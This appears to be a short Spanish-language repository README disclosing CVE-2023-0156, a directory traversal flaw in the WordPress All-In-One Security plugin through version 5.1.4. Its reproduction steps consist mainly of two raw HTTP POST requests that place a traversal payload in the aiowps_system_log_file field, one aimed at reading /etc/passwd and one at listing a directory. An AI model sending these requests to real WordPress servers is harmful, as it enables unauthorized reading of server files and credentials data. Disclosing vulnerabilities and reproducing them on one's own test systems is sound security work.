
Repositorio para la vulnerabilidad CVE-2023-0156.
ID de CVE: CVE-2023-0156
Tipo de vulnerabilidad: Recorrido de directorios
Descripción: El complemento All-In-One Security (AIOS) para WordPress es vulnerable a un recorrido de directorios en versiones hasta, e incluyendo, la 5.1.4. Esto permite a atacantes autenticados con permisos de nivel administrador leer el contenido de archivos arbitrarios en el servidor.
Pasos para reproducir:
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2
Host: <host>
Cookie: <cookies>
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
_wpnonce=<nonce>&aiowps_system_log_file=..%2F..%2F..%2F..%2Fetc%2Fpasswd&aiowps_search_error_files=View+latest+system+logs
POST /wp-admin/admin.php?page=aiowpsec_filesystem&tab=tab4 HTTP/2
Host: <host>
Cookie: <cookies>
Content-Length: 98
Content-Type: application/x-www-form-urlencoded
_wpnonce=<nonce>&aiowps_system_log_file=..%2F&aiowps_search_error_files=View+latest+system+logs
Referencia: